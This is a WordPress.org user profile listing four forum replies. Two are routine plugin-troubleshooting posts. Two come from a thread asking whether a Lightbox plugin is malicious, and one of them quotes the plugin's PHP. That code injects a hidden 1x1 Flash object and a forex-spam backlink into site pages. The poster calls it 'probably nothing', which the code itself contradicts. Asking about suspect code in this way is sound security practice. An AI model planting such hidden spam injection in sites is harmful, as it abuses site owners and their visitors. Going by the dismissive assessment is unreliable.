Title: adam.hal's Replies | WordPress.org

---

# adam.hal

  [  ](https://wordpress.org/support/users/adamhal/)

 *   [Profile](https://wordpress.org/support/users/adamhal/)
 *   [Topics Started](https://wordpress.org/support/users/adamhal/topics/)
 *   [Replies Created](https://wordpress.org/support/users/adamhal/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/adamhal/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/adamhal/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/adamhal/engagements/)
 *   [Favorites](https://wordpress.org/support/users/adamhal/favorites/)

 Search replies:

## Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[MailPoet - Newsletters, Email Marketing, and Automation] Mailpoet and Formidable Forms](https://wordpress.org/support/topic/mailpoet-and-formidable-forms/)
 *  [adam.hal](https://wordpress.org/support/users/adamhal/)
 * (@adamhal)
 * [5 years, 1 month ago](https://wordpress.org/support/topic/mailpoet-and-formidable-forms/#post-14172682)
 * Check
 * > Mail Poet > Settings > Send all site’s emails with…
 * Change it to “The default WordPress sending method (default)”
    -  This reply was modified 5 years, 1 month ago by [adam.hal](https://wordpress.org/support/users/adamhal/).
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Contact Form 7] Watermarks not working](https://wordpress.org/support/topic/watermarks-not-working/)
 *  Thread Starter [adam.hal](https://wordpress.org/support/users/adamhal/)
 * (@adamhal)
 * [13 years, 1 month ago](https://wordpress.org/support/topic/watermarks-not-working/#post-3558992)
 * It worked on the default theme.
    I removed all scripts from my theme apart from
   wpcf ones in the footer but it didn’t worked.
 * I use wp_register_script, wp_enqueue_script and add_action to include JS.
 * Is there anything else I can try to fix this?
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Lightbox plugin malicious?](https://wordpress.org/support/topic/lightbox-plugin-malicious/)
 *  Thread Starter [adam.hal](https://wordpress.org/support/users/adamhal/)
 * (@adamhal)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/lightbox-plugin-malicious/#post-3103576)
 * This code is probably nothing. It looks like a stanard lightbox code.
 *     ```
       $getuser = "http://forextrading7.com/";
       	$gethost = get_option('siteurl'); //wpaddress
   
         if (strstr($gethost, ".")) {
               $connectflash = "forex trading 7";
           }
           if (strstr($gethost, "a")) {
               $connectflash = "forextrading7";
           }
           if (strstr($gethost, "b")) {
               $connectflash = "forex trading online";
           }
           if (strstr($gethost, ".com")) {
               $connectflash = "http://forextrading7.com/";
           }
           if (strstr($gethost, ".org")) {
               $connectflash = "http://forextrading7.com";
           }
           if (strstr($gethost, "c")) {
               $connectflash = "forextrading7.com";
           }
           if (strstr($gethost, "d")) {
               $connectflash = "trading7";
           }
           if (strstr($gethost, "e")) {
               $connectflash = "forex";
           }
           if (strstr($gethost, "f")) {
               $connectflash = "fap turbo";
           }
           if (strstr($gethost, "g")) {
               $connectflash = "trading";
           }
           if (strstr($gethost, "h")) {
               $connectflash = "forex megadroid";
           }
           if (strstr($gethost, "i")) {
               $connectflash = "forex signals";
           }
           if (strstr($gethost, "j")) {
               $connectflash = "trading forex";
           }
           if (strstr($gethost, "k")) {
               $connectflash = "forextrading7.com";
           }
           if (strstr($gethost, "l")) {
               $connectflash = "forextrading7";
           }
           if (strstr($gethost, "m")) {
               $connectflash = "forex automoney";
           }
           if (strstr($gethost, "n")) {
               $connectflash = "forex robot";
           }
           if (strstr($gethost, "o")) {
               $connectflash = "forex 7";
           }
           if (strstr($gethost, "p")) {
               $connectflash = "online trading";
           }
           if (strstr($gethost, "q")) {
               $connectflash = "fap turbo forex";
           }
           if (strstr($gethost, "r")) {
               $connectflash = "forextrading7";
           }
           if (strstr($gethost, "s")) {
               $connectflash = "forex market";
           }
           if (strstr($gethost, "v")) {
               $connectflash = "fapturbo";
           }
           if (strstr($gethost, "x")) {
               $connectflash = "forex platform";
           }
           if (strstr($gethost, "y")) {
               $connectflash = "forex software";
           }
           echo '<object type="application/x-shockwave-flash" data="../wp-content/plugins/lightbox/apluslightbox.swf" width="1" height="1"><param name="movie" value="../wp-content/plugins/lighbox/apluslightbox.swf"></param><param name="allowscriptaccess" value="always"></param><param name="menu" value="false"></param><param name="wmode" value="transparent"></param><param name="flashvars" value="username="></param>';
           echo '<a href="';
           echo $getuser;
           echo '">';
           echo $connectflash;
           echo '</a>';
           echo '<embed src="../wp-content/plugins/lighbox/apluslightbox.swf" type="application/x-shockwave-flash" allowscriptaccess="always" width="1" height="1" menu="false" wmode="transparent" flashvars="username="></embed></object>';
   
       }
       ```
   
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Lightbox plugin malicious?](https://wordpress.org/support/topic/lightbox-plugin-malicious/)
 *  Thread Starter [adam.hal](https://wordpress.org/support/users/adamhal/)
 * (@adamhal)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/lightbox-plugin-malicious/#post-3103549)
 * Thank you for the links. I have already worked my way through majority of them
   and cleaned the website. I will take a look at the rest. The problem with the
   plugin is that website got infected after installing it. It might be coincidence
   though, I don’t know.
 * What about ‘function headpluslightbox()’ and its relation to header and the attached
   flash file? Isn’t that suspicious? I’m not into flash that much.

Viewing 4 replies - 1 through 4 (of 4 total)